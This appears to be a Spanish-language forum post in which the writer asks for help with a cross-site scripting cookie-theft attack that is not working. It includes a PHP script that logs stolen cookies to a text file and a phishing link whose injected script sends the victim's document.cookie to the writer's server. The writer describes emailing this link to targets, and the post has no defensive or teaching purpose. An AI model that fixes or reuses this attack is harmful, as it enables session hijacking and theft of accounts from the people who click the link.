Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS
Adjuntos:
Mi script PHP
Código:
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>
Lo que pongo en el hipervínculo:
Código:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>